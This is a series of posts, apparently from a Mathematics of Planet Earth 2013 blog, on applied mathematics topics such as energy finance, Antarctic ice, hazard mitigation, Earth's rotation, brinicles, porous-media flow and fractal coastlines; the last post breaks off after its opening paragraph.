    Commodities and energy markets continue to grow in activity and influence. Because of the growing concern about environmental issues inherent to the production and consumption of energy, quantitative insights into these marketplaces are crucial for sustainable development and policy making with respect to climate change.

    How do we model the strategic behavior of existing oil producers facing new green energy competitors? Can we design an effective and fair market for CO2 emission allowances? How do we quantify the gains from building more efficient electricity grids? What are best ways of sharing weather risk?

    These and other questions are part of ongoing research trends in Financial Mathematics. Stochastic modeling has provided a fertile interdisciplinary approach to analyzing the design, valuation, trading and risk management of commodity contracts. Energy policy-making, moving from exhaustible fuel sources to renewable ones, accounting for spikes in electricity prices in response to demand and weather, controlling carbon emissions from polluting industries, and regulating the
    speculative role of financial traders in commodity markets are some of the major new challenges facing researchers at the interface of finance, economics, insurance, and stochastic analysis. The above issues which are central to the themes of MPE, highlight another facet of applied mathematics that helps our understanding of the environment.

    As part of Mathematics of Planet Earth activities, the Fields Institute in Toronto, ON Canada will host during August 6-30, 2013 a Focus Program on Commodities, Energy, and Environmental Finance. The Focus Program is dedicated to exposing its participants to the latest state-of-the-art in this very recent field, that is experiencing a very fast development enhanced by connections with many other topics of applied mathematics.

    Among the topics that will be discussed are the increased “financialization” of commodities markets, analysis of oligopolies in energy markets, equilibrium and risk transfer in environmental finance, stochastic control of energy, electricity and commodity markets and modeling of electricity supply and demand. Associated mathematical developments include nonlinear PDEs, backward SDEs, mean-field games, inverse problems, risk measures and high-dimensional stochastic control.

    The Focus Program’s activities include a Summer School during August 6-27, 2013 with 3 mini-courses given by F. Benth, R. Carmona and G. Swindle, as well as two Workshops:

    Aug 14-16, 2013: Workshop on Electricity, Energy and Commodities Risk Management
    Aug 27-29, 2013: Workshop on Stochastic Games in Environmental Finance

    More information can be found here.

    Mike Ludkovski (UCSB)

    Posted in Climate, Economics, Finance, Mathematics, Uncertainty Quantification, Workshop Announcement | Leave a comment

    Another Applied Mathematician in Antarctica

    I recently had the opportunity to travel to the Antarctic peninsula on board the National Geographic Explorer. We departed out of Ushuaia, Argentina, crossed the Drake Passage and spent the better part of a week exploring the northwestern side of the Antarctic peninsula from the South Shetland Islands to just inside the Antarctic Circle in Crystal Sound.

    I was traveling with an alumni group from St. Olaf College led by Physics Professor and Geophysicist Robert Jacobel, who had traveled to Antarctica numerous times to do ice radar and remote sensing research, most recently with the Whillans Ice Stream Subglacial Access Research Drilling (WISSARD) project in West Antarctica.* In addition to Jacobel’s expertise on glaciers and ice, the NG Explorer was staffed with numerous naturalists with expertise in Antarctic marine mammals, sea birds, underwater creatures, global climate dynamics as well as the history of Antarctic exploration in general. As an applied mathematician who has studied fluid dynamics, solidification/melting and mushy layer formation in aqueous systems computationally and in the lab, the opportunity to see first hand Antarctica’s version of these proceedings was very exciting. I was in the Earth’s cold lab getting a guided tour of science in action.

    Neko Harbor

    Neko Harbor

    From a purely touristic point of view the Antarctic peninsula, via the comfortable NG Explorer, was a fabulous place to travel. Each day greeted us with a new experiences that stimulated the senses — sights of vast glaciers and countless icebergs, the up-close sounds of humpback whales surfacing to breathe alongside our Zodiac, the smell of a Chinstrap penguin colony, the endless rocking motion crossing the Drake Passage, and the chilling sensation of a quick dip in the sheltered waters of Deception Island. Maybe not Shackleton’s exact experience — I would not have minded getting beset in ice to extend our time down there a bit longer — but its the spirit of adventure and discovery that counts.

    At the same time, as an applied mathematician I felt immersed in a very unique laboratory environment. I found myself sitting in the midst of a penguin colony and watching the adults defend their chicks from skuas, work tirelessly building rock nests one carefully-selected rock at a time, or go out in search of everyone’s favorite biomass – Euphausia superba, Antarctic krill. I want to write down a population dynamics model for a penguin colony, calculate krill consumption factors, couple it to predatory leopard seals and skuas and factor in rare events such as an ill-timed snow storm that may determine the success of failure of the entire colony’s breeding season. Then I get distracted by a giant chunk of ice that calves from a glacier and I start thinking about ice sheets, ice shelves and grounding lines. A penguin waddles by and I snap a photo. He smells like krill. I wonder what it is about sea ice that the krill like so much. Maybe they know something about mushy layers that I do not.

    There is a great history of scientific research in Antarctica and applied mathematicians have certainly made important contributions. Readers of this blog will already know about previous entries by Hans Kaper: Mathematician stepping on thin ice (January 12, 2013) and by Robert Bryant: From the JMM – Porter Lecture by Professor Ken Golden (January 13, 2013). As an interested reader I would like to bring a few other contributions to your attention. I know I am biased but to me there is nothing more quintessentially applied math than the method of matched asymptotic expansions. An excellent example of this in the context of marine ice sheet dynamics can be found in papers by Christian Schoof [Marine ice-sheet dynamics. Part 1. The case of rapid sliding. Journal of Fluid Mechanics 573 (2007) 27–55 and Marine ice sheet dynamics. Part 2. A Stokes flow contact problem. Journal of Fluid Mechanics 679 (2011) 122–155]. In fact, there has been a lot of applied mathematics activity in the area of ice-sheet, ice-shelf and grounding-line dynamics. The ice sheets covering West Antarctica, which motivate many of these studies, rest on bed rock below sea level and consequently play a particularly important role in the global climate dynamics picture.

    Having spent some time sitting and watching penguins and their infinitely interesting behaviors I was interested to see in the recent literature a contribution from a group of applied mathematicians on the huddling behavior of penguins [A. Waters, F. Blanchette and A.D. Kim, Modeling Huddling Penguins, PLOS ONE 7 (2012) e50277]. This fluid and heat transfer model incorporates a penguin-behavior component to test the idea that penguins huddle to reduce their exposure to the cold.

    Despite the grandness, importance and allure of a place like Antarctica, there is no shortage applied mathematics opportunities closer to home. The previous bloggers have highlighted many of these. May we all find opportunities to make 2013 a successful year for our planet.

    Daniel Anderson
    Professor, Mathematical Sciences
    George Mason University
    and
    Faculty Researcher
    Applied and Computational Mathematics Division
    National Institute of Standards and Technology

    The views presented here are those of the author and do not necessarily represent the views of policies of NIST.

    *For those of you interested in reading blogs check out the WISSARD Blog Site.

    Posted in Biodiversity, Cryosphere, General | Leave a comment

    Finding a Sensible Balance for Natural Hazard Mitigation with Mathematical Models

    Uncertainty issues are paramount in the assessment of risks posed by natural hazards and in developing strategies to alleviate their consequences. In a paper published last month in the SIAM/ASA Journal on Uncertainty Quantification, the father-son team of Jerome and Seth Stein describe a model that estimates the balance between costs and benefits of mitigation following natural disasters, as well as rebuilding defenses in their aftermath. Using the 2011 Tohoku earthquake in Japan as an example, the authors help answer questions regarding the kinds of strategies to employ against such rare events.

    “Science tells us a lot about the natural processes that cause hazards, but not everything,” says Seth Stein. “Meteorologists are steadily improving forecasts of the tracks of hurricanes, but forecasting their strength is harder. We know a reasonable amount about why and where earthquakes will happen, some about how big they will be, but much less about when they will happen.”

    Earthquake cycles—triggered by movement of the Earth’s tectonic plates and the resulting stress and strain at plate boundaries —are irregular in time and space, making it hard to predict the timing and magnitude of earthquakes and tsunamis. Another conundrum for authorities in such crisis situations is the appropriate amount of resources to direct toward a disaster zone.

    In this paper, the authors set out to “find the amount of mitigation—which could be the height of a seawall or the earthquake resistance of buildings—that is best for society,” explains Stein. “The challenge is deciding how much mitigation is enough. Although our first instinct might be to protect ourselves as well as possible, resources used for hazard mitigation are not available for other needs.”

    The objective is to provide methods for authorities to use their limited resources in the best possible way in the face of uncertainty.

    Selecting an optimum strategy depends on estimating the expected value of damage. This, in turn, requires prediction of the probability of disasters. It is still unknown whether to assume that the probability of a large earthquake on a fault line is constant with time (as routinely assumed in hazard planning) or whether the probability gets smaller after the last incidence and increases with time.

    Hence, the authors incorporate both these scenarios using the general probability model of drawing balls from an urn. If an urn contains balls that are labeled “E” for event and “N” for no event, each year is like drawing a ball. Following the draw, the ball can be replaced or not replaced in the urn based on whether or not the probability of an event depends on a previous event having occurred and the time since the past occurrence. The model also incorporates parameters for strain accumulation at plate boundaries as well as strain release during earthquakes.

    The optimal mitigation strategy is selected by using a general stochastic model. The authors minimize the expected present value of damage, the costs of mitigation, and the risk premium, which reflects the variance, or inconsistency, of the hazard. The optimal mitigation is the bottom of a U-shaped curve summing up the cost of mitigation and expected losses, a sensible balance.

    Natural Hazard - Cost vs. Mitigation Level

    How much mitigation is needed? This is the bottom of a U-shaped curve that is the total cost – the sum of both the cost of mitigation and the expected losses in a disaster. More mitigation can reduce losses in possible future disasters, at increased cost. Less mitigation reduces costs, but can increase potential losses. The bottom of the curve is a “sweet spot” – a sensible balance.

    To determine the advantages and pitfalls of rebuilding after such disasters, the authors present a deterministic model. Here, outcomes are precisely determined by taking into account relationships between states and events.

    Such models can also be applied toward other disaster situations, such as hurricanes and floods, and toward policies to diminish the effects of climate change. “Given the damage to New York City by the storm surge from Hurricane Sandy, options under consideration range from doing nothing, using intermediate strategies like providing doors to keep water out of vulnerable tunnels, to building up coastlines or installing barriers to keep the storm surge out of rivers,” explains Stein. “In this case, a major uncertainty is the effect of climate change, which is expected to make flooding worse because of the rise of sea levels and higher ferocity and frequency of major storms. Although the magnitude of these effects is uncertain, this formulation can be used to develop strategies by exploring the range of possible effects.”

    To read the detailed article and view the source paper, click here.

    Posted in Mathematics, Natural Disasters, Risk Analysis, Uncertainty Quantification | Leave a comment

    Why do earthquakes change the speed of rotation of the Earth?

    MPE2013 gives us an opportunity to learn more about our planet. There are interesting features to be explored that require simple but deep principles of physics and that can become the basis of a discussion in the classroom. I frequently teach future high-school teachers and like to start by exploring questions that come from many different directions. Here is one.

    During an earthquake, the mass distribution in the Earth’s crust changes. This changes the Earth’s moment of inertia, which is the sum of the moments of inertia of each point. The moment of inertia of a point mass is the product of its mass and the square of its distance to the axis of rotation. Meanwhile the angular momentum is preserved: this angular momentum is the sum of the moments of inertia of each point mass times its angular velocity. Hence, if the moment of inertia of the Earth decreases (increases), the angular velocity of the Earth increases (decreases). The simple physical principle of conservation of angular momentum thus allows us to explain disparate phenomena such as the Earth’s changing rotation rate, figure skaters spinning, spinning tops, and gyroscopic compasses.

    The major earthquakes in Chile (2010) and Japan (2011) increased the Earth’s spin and hence decreased the length of the day. We could imagine that the length of the day would be measured by taking, for instance, a star as some fixed point of reference. But instead, geophysicists use seismic estimates, through GPS measurements, of the movements of the fault to compute how the mass distribution and thus the length of the day has changed. According to Richard Gross, a geophysicist working at NASA’s Jet Propulsion Laboratory, the length of the day has decreased by 1.8 microseconds as a result of the 2011 Japan earthquake.

    Instead of continuing to read Richard Gross’ interview, you can start playing the game and discover for yourself the answer to the next questions. For instance, earthquakes closer to the Equator have a larger effect on the Earth’s spin than those close to the poles. Similarly, those with vertical motion have a larger effect than those with horizontal transversal motion.

    It is also an opportunity to start discussing the motion of a solid (here the Earth) in space. On short intervals of time, the speed of the center of mass is approximately constant. Hence, if we consider a reference frame centered at the center of mass and moving uniformly, then we are left with three degrees of freedom for the movement of the solid. The derivative of this movement is a linear orthogonal transformation preserving the orientation. Hence, it is a rotation around an axis: the north-south axis. The three degrees of freedom describe the position of the axis and the angular velocity around it. But there is a second axis, which is very important: it is the Earth’s figure axis, about which the Earth’s mass is balanced. This axis is about 10 meters offset off the north-south axis. Large earthquakes abruptly move the position of this axis. For the 2011 Japan earthquake, the shift has been estimated at 17 centimeters.

    Earthquakes are far from being the only phenomena changing the angular speed of rotation and the position of the Earth’s figure axis. Indeed, they change with atmospheric winds and oceanic currents, but these changes are smoother than the ones observed with earthquakes.

    Should we care for such small changes? According to Richard Gross, we should if we work for NASA and, for instance, intend to send a spacecraft to Mars and land a rover on it. Any angular error may send us very far from our target.

    Christiane Rousseau

    Posted in Geophysics, Natural Disasters | Leave a comment

    Brinicles and Chemical Gardens

    The ship drove fast, loud roared the blast,
    And southward aye we fled.

    And now there came both mist and snow,
    And it grew wondrous cold:
    And ice, mast-high, came floating by,
    As green as emerald.

    And through the drifts the snowy clifts
    Did send a dismal sheen:
    Nor shapes of men nor beasts we ken–
    The ice was all between.

    The ice was here, the ice was there,
    The ice was all around:
    It cracked and growled, and roared and howled,
    Like noises in a swound!

    Coleridge’s ancient mariner voyaged to the southern seas around what we now call Antarctica. Beneath the ice pack around the continent that he describes so vividly, the BBC recently filmed for the first time the growth of a strange tube of ice hanging down into the ocean from the floating ice. They entitled their fascinating film “‘Brinicle’ ice finger of death”. You can see why if you watch it here. When the brinicle touches the sea floor, it entombs all it touches, including starfish and sea urchins, in ice.

    I saw that amazing brinicle footage at the end of 2011 when I was busy writing up a large ice physics review paper. I included in it the bibliography I found on ‘ice stalactites’ or brinicles, from the 1970s; there wasn’t much.

    Brinicles under the Antarctic ice pack

    A diver observes brinicles under the Antarctic ice pack (thanks to Rob Robbins, Hubert Staudigel, and the US Antarctic Program for the picture).

    As well as the physics of ice, I’m also investigating another example of wonderful patterns in nature: chemical gardens. You may, like me, have played with making these strange crystal growths as a child; my chemistry set contained all the ‘ingredients’ -or, as a chemist would say, reagents- to make them.

    Chemical gardens also form tubes, like brinicles, although generally at a much smaller scale. I realized that these brinicle ice tubes could be seen as a form of chemical garden growth, and with my colleagues Bruno Escribano, Diego Gonzalez, Ignacio Sainz, and Idan Tuval I developed the idea. The key to understanding how they grow is that the process depends on salt. As their name implies, brinicles form from briny water – Coleridge reminds us in one of the most famous lines of the Ancient Mariner that the seas are not pure water, but salty brine:

    “Water, water, every where,
    Nor any drop to drink.”

    We worked out the mechanisms of the brinicle formation process, which turns out to have basically the same physics as chemical gardens in the laboratory, and we have just published a paper about this.

    Brinicle Formation

    Brine emerging from the tip of the tube of a growing brinicle (again thanks to Rob Robbins, Hubert Staudigel, and the US Antarctic Program for the picture).

    Brinicles are fun things to think about, but they also have broader implications. On one hand, as heat flows through them, they contribute to the energy balance in the ice pack around Antarctica. We need better mathematical models of this ice pack, to be able to know how it’s affected by climate change. And, to build a better model, one needs to know about brinicles.

    On the other hand, there’s a lot of work going on at the moment to understand the origins of life. Many people are working on a promising theory of life’s beginnings in the hot environment of hydrothermal vents on the ocean floor. But perhaps brinicles provide a cold alternative? There are many parallels in terms of energy sources between so-called black smokers on the ocean floor and brinicles in cold environments. One of my colleagues, Hauke Trinks, has spent several winters in Svalbard looking at complex chemistry in sea ice, which is relevant for the origins of life in the cold.

    So might brinicles on the early Earth have played a role in the beginnings of life? What would the ancient mariner have made of that idea?

    Julyan Cartwright
    Consejo Superior de Investigaciones Científicas (CSIC)
    Instituto Andaluz de Ciencias de la Tierra, CSIC-UGR
    Campus Fuentenueva, E-18071 Granada, Spain
    e-mail julyan.cartwright@csic.es
    WWW http://www.lec.csic.es/~julyan/

    Posted in Biogeochemistry, Cryosphere, General | Leave a comment

    More about E.O. Wilson’s Story “Great Scientist > Good at Math”

    Today’s blog is an update on a story that was in the news earlier and also some comments on a recent article in the New York Review of Books. (See the blog of 4.11.2013.)

    The E.O. Wilson story about math and science generated much discussion. David Bailey and Jonathan Borwein wrote a nice column on “The Blog” on the Huffington Post site in response to the Wilson article. They quote Darwin in the last paragraph:

    “During the three years which I spent at Cambridge my time was wasted, as far as the academical studies were concerned, as completely as at Edinburgh and at school. I attempted mathematics and even went during the summer of 1828 with a private tutor (a very dull man) to Barmouth, but I got on very slowly. The work was repugnant to me, chiefly from my not being able to see any meaning in the early steps in algebra. This impatience was very foolish, and after many years I deeply regret that I did not proceed far enough at least to understand something of the great leading principles of mathematics, for men thus endowed seem to have an extra sense.” (Charles Darwin)

    Recall that Wilson said that Darwin did not need much math and developed his theories through the power of observation.

    A melting iceberg from the South Sawyer Glacier in the Tracy Arm Fjord, near Juneau, Alaska. (From the article by Bailey and Borwein)

    The May 9th issue of The New York Review of Books has an interesting review, called “Some Like It Hot” by Bill McKibben of three recently published reports about climate change. The first is “Climate and Social Stress: Implications for Security Analysis.” McKibben, founder of 350.org, points out that the report warns of risk to water supplies and the risk of famine and has a particular focus on yellow fever and public health risk. The second report is from the World Bank, “Turn Down the Heat: Why a 4º C Warmer World Must Be Avoided.” The focus of this report is on how the rise in temperature will make life impossible for many, especially the poor, and the effect on productivity. The final piece reviewed is a report called “The Collapse of Western Civilization: A View from the Future” by Naomi Oreskes and is a fictional account of a report looking back form 2373 and lamenting the failure of of our governments to act on climate change in the present time, “a second Dark Ages had fallen on Western civilization, in which denial and self-deception, rooted in an ideological fixation on ‘free’ markets, disabled the world’s powerful nations in the face of tragedy.”

    The review is not optimistic about the future but worth reading.

    Estelle Basor
    AIM

    Posted in Biology, Evolution, General, Mathematics | Leave a comment

    ICERM IdeaLab on Tipping Points, July 15-19, 2013

    Climate tipping points refer to sudden rapid transitions of the Earth’s climate that are precipitated by initially small changes of the natural environment. For instance, tipping points could correspond to the activation of positive feedback loops that then lead to a major change in the climate. An example of one such feedback loop would be the decrease in the extent of Arctic sea ice cover, or equivalently a decrease in the Earth’s albedo, which would result in the Earth warming and a further decrease in sea ice cover. Thus, the loss of sea ice could potentially correspond to approaching a climate tipping point.

    Over the past years, mathematicians have begun to develop mathematical theories of tipping points, which identified a variety of different mechanisms. These mechanisms rely on different assumptions about the underlying dynamic behavior and involve, for instance, passage through bifurcations, fast-slow time scales, stochastic effects, and different types of forcing. This is an active and rapidly growing area of research in applied mathematics, and many new ideas will be needed to gain more insight into tipping points.

    To help develop new ideas and to expose more early career researchers to climate tipping points, the Institute for Computational and Experimental Research in Mathematics (ICERM), an NSF funded mathematical sciences institute at Brown University, will hold an IdeaLab during July 15-19, 2013. Twenty early-career researchers will work for a week in teams on projects in

    – Tipping Points in Climate Systems
    – Towards Efficient Homomorphic Encryption

    IdeaLabs bring together researchers with different backgrounds to brainstorm and get a fresh look at interesting and exciting topics of current interest. This is a great opportunity to learn more about tipping points, share ideas with peers, and get to know program officers from different funding agencies who will outline funding opportunities. Applications to this program will still be considered: more information can be found here.

    Bjorn Sandstede
    ICERM

    Posted in Climate, Mathematics, Workshop Announcement | Leave a comment

    Data Visualization and Infographics

    Last week I attended a D.C. Art Science Evening Rendezvous (DASER) at the National Academies in my hometown, Washington, DC. These events are held once a month and provide a forum to discuss art and science projects in the national capital region and beyond. This month’s theme was Data Visualization, the process of creating infographics. I had long been familiar with the concept of data visualization but only recently come across the term infographics, so the topic was very timely.

    Infographics (short for Information Graphics) are graphic visual representations of information, data or knowledge. They are intended to present complex information quickly and clearly. If done right, they enhance our visual system’s ability to see patterns and trends. Public transportation maps such as those for the Washington Metro system are examples of infographics.

    Map - Washington, DC, Metro system

    Map of the Washington, DC, Metro system

    The “gold standard” for information graphics is Charles Joseph Minard’s representation of Napoleon’s invasion of Russia. Issued in 1861, the graphic captures four different changing variables that contributed to Napoleon’s downfall in a single two-dimensional image: the army’s direction as they traveled, the location the troops passed through, the size of the army as troops died from hunger and wounds, and the freezing temperatures they experienced.

    Minard's 1861 Map of Napoleon's invasion of Russia

    Minard’s 1861 Infographic of Napoleon’s Invasion of Russia

    Edward Tufte, a pioneer in data visualization, wrote a series of books —Visual Explanations, The Visual Display of Quantitative Information, and Envisioning Information— on the subject of information graphics. To Tufte, a good data visualization represents every data point accurately and enables a viewer to see trends and patterns in the data. Tufte’s contribution to the field of data visualization and infographics is considered immense, and his design principles can be seen in many websites, magazines, and newspapers today.

    Katy Borner (Professor of Information Science, Indiana University, Bloomington) gave an overview of the exhibit Places & Spaces: Mapping Science, which she curated, and discussed the Information Visualization MOOC she teaches at Indiana University. She is interested in the development of cyberinfrastructure for large-scale scientific collaboration and computation. Ward Shelley, a New York-based artist, presented several examples of his information-based diagrams featured in the exhibition. Among them was a History of Science Fiction, which I thought was an interesting concept. The importance of infographics in geography was demonstrated by Gary Berg-Cross, a cognitive psychologist, who is executive secretary of the Spatial Ontology Community of Practice (SOCoP) project INTEROP, an Interdisciplinary Network to Support Geospatial Data Sharing, Integration, and Interoperability, a project supported by the National Science Foundation. The last speaker was Stephen Mautner, executive editor at the National Academies Press, Washington, D.C., who provided an update on an initiative to visually represent the many reports issued by the Academies as a network of nodes connected by common terms or concepts. The network is currently a stand-alone product that can be manipulated to highlight certain categories, with a drill-down facility that enables the user to get more detailed information.

    I decided to write about this event because the graphical representation of data will become more important as more and more data are becoming available. Too often, I see figures in scientific publications where space is wasted, fonts are too small, or labels are missing. The forum convinced me that a bit more thought can go a long way to optimize the effectiveness of infographics.

    Posted in Data Visualization, General | Leave a comment

    Flow through heterogeneous porous rocks: What average is the correct average?

    How fast does water flow through sand or soil? Maybe not so fast, but everyone has seen water soak into beach sand and garden soils. Most people have also noticed a concrete sidewalk soaking up a little water as rain begins to come down. But how fast does water flow through a rock? The obvious answer is incorrect: water does indeed flow through rocks. Not the rock grains themselves, but it can squeeze through the pore spaces between the rock grains. We say that the Earth’s subsurface is porous, and that it is a porous medium.

    Fluid flow through the planet’s subsurface is critically important to many ecological and economic activities. Subsurface flow is an important part of the entire water cycle. In fact, the United States Geologic Survey estimates that, worldwide, there is 30 times more groundwater stored in aquifers than is found in all the fresh-water lakes and rivers. Unfortunately, contaminants sometimes leach out of storage sites, either from above ground tanks or through underground containment barriers, and travel through the Earth. Petroleum and natural gas are extracted from the subsurface by inducing these fluids to flow to production wells. To mitigate the effects of greenhouse gas accumulation in the atmosphere, technologies are being developed to sequester carbon dioxide, extracted from power plant emissions, in deep underground reservoirs. These and many other situations make it important that we have the ability to simulate the flow of fluids in the subsurface. The simulations give us a visual and quantitative prediction of the movement of the fluids, so that scientists, engineers, and regulators can design appropriate steps to, e.g., protect the natural ecosystem and human health, optimize the economic benefit of the world’s underground natural fluid resources, and minimize unintended impact on the natural environment.

    So, how fast does fluid flow in porous media? In 1856, a French Civil engineer by the name of Henri Darcy determined through experimental means the speed at which fluid flows through a sand column when subjected to pressure. He gave us his now famous Darcy’s Law, which states that the fluid velocity is proportional to the pressure gradient. Subsequent experiments verified that the law holds for all types of porous media. The proportionality constant in Darcy’s law, times the fluid viscosity, is called the permeability of the porous medium. The permeability is a measure of how easily fluid flows through a rock or soil.

    There are many difficulties associated with simulating the flow of fluid through a natural porous medium like a groundwater aquifer or a petroleum reservoir. One of them is dealing with the extreme heterogeneity of a natural rock formation. One sees this extreme heterogeneity in outcrops, which are rock formations that are visible on the surface of the Earth, such as is often seen from a roadway which has been cut into a hill or mountain. In Figure 1, we show results from researchers at the University of Texas at Austin’s Bureau of Economic Geology, who measured the permeability of an outcrop. The permeability is shown on a log scale, and it varies from $10^{-16}$ (blue) to $10^{-11}$ (red) over a few meters. That is, the fluids can be moving about 100,000 times faster in one area of the rock than another less than a meter away.

    outcrop permeability

    Figure 1. Permeability of an outcrop (on a log scale).

    An underground aquifer or reservoir domain can be very large, spanning a few to hundreds of kilometers. Normally a simulation of fluid flow will involve a computational grid of cells that cover the domain. The fastest supercomputers can possibly handle enough cells so that each is about ten meters square. But at that scale, we have lost all details of the permeability’s heterogeneity, and consequently many important details of the fluid flow! So the challenge is to find a way to resolve the details of the fluid flow without using a computational grid that is able to resolve the flow. It sounds like a contradiction.

    This is one place where mathematics and mathematicians can help. Since we cannot resolve all the details of the flow, let us make as our goal the ability to approximate the average flow within each grid cell, by simplifying the geologic structure of the porous medium. That is, we desire to replace the complex heterogeneous porous medium within a grid cell by a simple homogeneous porous medium with an average value of permeability, as depicted in Figure 2. But what should this average permeability be? It should be chosen so that the average amount of fluid flowing through the grid cell is the same for the true and fictitious media.

    Equivalent homogeneous rock


    Figure 2. The heterogeneous porous medium is replaced by a homogeneous one with an average permeability k, chosen so that the average amount of fluid flow is the same.

    It is fairly easy to solve the differential equations governing the flow of fluid in simple geometries. For a layered porous medium, there are two possibilities. As depicted in Figure 3, when the flow is going along with the geologic layers, the correct way to average the permeability is to take the usual arithmetic average. In this case, (k1 + k2)/2.

     Arithmetic averaging needed

    Figure 3. Flow going along with the geologic layers requires arithmetic averaging of the permeability k.

    When fluid flows so that it cuts through the layers, as depicted in Figure 4, the arithmetic average permeability does not give the correct average fluid flow. This is perhaps easy to see by considering the possibility that one of the layers becomes impermeable, say k1=0, so that fluid cannot flow through it. In this case, there will be no flow through the entire grid cell. But the arithmetic average is k2/2>0, and we should expect some fluid flow through the grid cell. The correct average to take is the harmonic average, which is the reciprocal of the arithmetic average of the reciprocals, i.e., 2/(1/k1 + 1/k2).

    Harmonic averaging needed

    Figure 4. Flow that cuts through the geologic layers requires harmonic averaging of the permeability k.

    The harmonic average is always less than or equal to the arithmetic average. But what about a genuinely heterogeneous porous medium like that shown in Figure 5? More sophisticated averaging techniques must be used, such as arise in the mathematical theory of homogenization. It can be proven that the correct average always lies between the harmonic and arithmetic averages, so our layered case actually gives the extreme cases of the problem. In fact, homogenization is also able to account for the fact that porous media may be anisotropic, i.e., they do not behave the same in every direction. The example in Figure 5 is anisotropic, since perhaps one can see that as fluid tries to flow from left to right, it will also tend to flow upwards a bit as well.

    Some more complex averaging needed

    Figure 5. Flow through a heterogeneous geologic region requires more complex averaging of the permeability.

    These averaging techniques work well for even very complex geology. For example, consider the heterogeneous rock shown in Figure 6, which is a complex mixture of fossil remains, limestone, sediments, and vugs, which are large open spaces in the rock. Without a theoretically sound mathematical averaging technique, would you like to guess the average permeability of this rock?

     vuggy porous medium

    Figure 6. A highly heterogeneous, vuggy porous medium.

    More complex numerical models have also been developed by mathematicians, that not only give the correct average flow, but also attempt to recover some of the small scale variability of the flow. Such multi-scale numerical methods are an active area of research today. These methods can allow scientists and engineers to simulate the flow of fluids in the subsurface in an accurate way, even on computational grids too coarse to resolve all the details. It almost seems like magic. But it is not magic, it is mathematics.

    Todd Arbogast
    Professor of Mathematics
    University of Texas at Austin

    Posted in Geophysics, Mathematics | Leave a comment

    SIAM Conference “Applications of Dynamical Systems” and MPE2013

    The Earth is a giant dynamical system that evolves over time at various scales, depending on the state(s) of interest. Therefore, it is not surprising that a conference on applied dynamical systems would feature topics central to Mathematics of Planet Earth 2013. Indeed, the organizers of the SIAM Conference on Applied Dynamical Systems named MPE 2013 a conference theme.

    Several minisymposia are clustered around MPE 2013 concerns. Among them are a session on Dynamics of Marine Ecosystems and another, labeled, appropriately enough, Dynamics of Planet Earth. Speakers in the latter, which is organized by Hans Kaper, will discuss energy balance models, ocean circulation models, and the carbon cycle. The focus of the session will be on challenges arising in the mathematical sciences, and dynamics in particular, in modeling these complex systems and analyzing their behavior. We often hear the term “tipping point,” popularized by writer Malcolm Gladwell. Using the conceptual framework of bifurcation theory, Mary Silber will introduce the mathematical mechanisms of tipping points and highlight some of the challenges and limitations encountered in exploiting this framework; noteworthy application areas include the retreat of arctic sea ice and desertification. The concept of tipping points also surfaces in the talk of Marty Anderies on carbon cycle dynamics; here, the goal is to construct a reasonable representation of a feedback system between different carbon stores and use it to explore what might be called a “safe operating space” for humans.

    These and related conference sessions and talks exemplify the many ties between dynamics and MPE 2013 and show how mathematics contributes to our understanding of the Earth.

    Posted in Climate, Conference Announcement, Mathematics | Leave a comment

    Some universality in fractal sea coasts?

    Sandy coasts have a smooth profile while rocky coasts have a fractal nature. One characteristic feature of a rocky coast is that new details appear when we zoom in on it. And if we were to measure the length of the coast, the length would increase significantly when zooming in on the details. If we model this coast as a curve, then this curve would have an infinite length. One summarizes some characteristics of the coast through a number, the dimension, which describes the “complexity” of the curve. A smooth curve has a dimension of 1, while a surface has a dimension of 2. A dimension between 1 and 2 is typical of a self-similar object which is thicker than a curve but with empty interior. How does the dimension of a fractal coast depend on the coast? An article of Sapoval, Baldassarru and Gabrielli (Physical Review Letters 2004) presents a model suggesting that this dimension is independent of the coast and very close to 4/3.

    The model of of Sapoval, Baldassarru and Gabrielli describes the evolution of the coast from a straight line to a fractal coast through two processes with two different time scales: a fast time and a slow time. The mechanical erosion occurs rapidly, while the chemical weakening of the rocks occurs slowly. The force of the waves acting on the coast depends on the length of the coast. Hence, the waves have a stronger destructive power when the coast is linear and a damping effect takes place when the coast is fractal. The erosion model is a kind of percolation model with the resisting Earth modeled by a square lattice. The lithology of each cell, i.e., the resistance of its rocks, is represented by a number between 0 and 1. The resistance to erosion of a site, also given by a number between 0 and 1, depends both on its lithology and on the number of sides exposed to the sea. Then an iterative process starts: each site with resistance number below a threshold disappears, and the resistances of the remaining sites are updated because new sides become exposed to the sea. This leads to the creation of islands and bays, thus increasing the perimeter of the coast. When the perimeter is sufficiently large, thus weakening the strength of the waves, the rapid dynamics stops, even if the power of the waves is nonzero! During this period the dimension of the coast is very close to 4/3.

    This is when the slow dynamics takes over since chemical weakening of the remaining sites continues, thus reducing the resistance to erosion of sites. The slow dynamics is interrupted by short episodes of fast erosion when the resistance number of a site falls below the threshold. This dynamics of alternating short episodes of fast erosion and long episodes of chemical weakening is exactly what we observe now, since the initial fast dynamics occurred long ago.

    The model presented here is a model of percolation gradient, with the sea percolating in the Earth, and such models of percolation gradient exhibit universality properties.

    Christiane Rousseau

    Posted in Geophysics, Ocean | Leave a comment

    “Sustainability Improves Student Learning (SISL) in STEM”

    How precarious is the existence of the Monarch butterfly? Does personal diet affect the environment? What are the consequences of increased human life expectancy?

    Last month I spent three days with nearly two dozen mathematics colleagues and sustainability experts at the MAA Carriage House. We organized, refined, and developed sustainability-focused modules for use in the introductory undergraduate math classroom. This workshop is part of the mathematics community’s contribution to the American Association of Colleges and University’s broader “Sustainability Improves Student Learning (SISL) in STEM” initiative, which has brought together numerous professional societies to better prepare undergraduate students for the 21st-century “Big Questions” that relate to real-world challenges such as energy, air and water quality, and climate change.

    Not surprisingly, these “Big Questions” are frequently investigated through mathematics; however this workshop was focused on identifying ways to make these topics appropriate and accessible to students taking their first college math course. Currently 20 sustainability activities have been released for general use on the Science Education Resource Center website (SERC) at Carleton College.

    I believe this is just the beginning; as the SISL page on the SERC site is designed to be a resource for all interested in sustainability themed mathematics curriculum.

    I invite you to view, use and submit activities on this site.

    Benjamin Galluzzo
    BJGalluzzo@ship.edu

    Posted in General, Mathematics, Sustainability, Workshop Report | Leave a comment

    Raspberry Fields Forever (cont’d)

    In a recent conversation with an acquaintance, she asked me “What do you do besides frustrate people with algebra?”. Sadly, she was serious. She had no idea of the use of mathematics outside of designing torture mechanisms for young people in school. Our team had begun our initial work on what we call the “berry problem”, and I was able to describe our efforts to help stakeholders in the Pajaro Valley region in California balance water needs among competing interests.

